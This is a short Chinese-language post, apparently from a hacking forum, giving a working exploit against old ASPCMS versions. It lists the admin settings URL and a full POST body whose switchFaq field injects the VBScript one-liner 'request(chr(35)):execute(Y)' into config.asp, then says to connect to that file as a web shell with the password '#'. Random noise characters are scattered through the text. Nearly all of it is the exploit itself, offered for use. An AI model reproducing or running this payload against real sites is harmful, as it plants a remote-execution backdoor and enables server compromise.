老的ASPCMS版本的秒杀拿SHELL漏洞
C7 z6 M" Q: _3 N1 L+ u# `) O- [ l' J1 u
找到后台。。。然后
2 p6 i% b% V6 G
: e; W+ ^9 R8 b9 ~. u6 R/admin/_system/AspCms_SiteSetting.asp?action=saves7 k* Y# P+ U2 s- W. _$ s8 P
4 ]$ [, z5 ~! I& i! I, [直接POST& r; Y3 R8 ~% b) Q( g% y+ R" M
+ k z; \) v5 s# C- YrunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=17 H) ^" X; I, e0 s
- m% A3 G$ W2 ^0 L再连接配置文件config.asp 密码为#/ `# @6 K* g1 V, u o A# \9 b4 H
|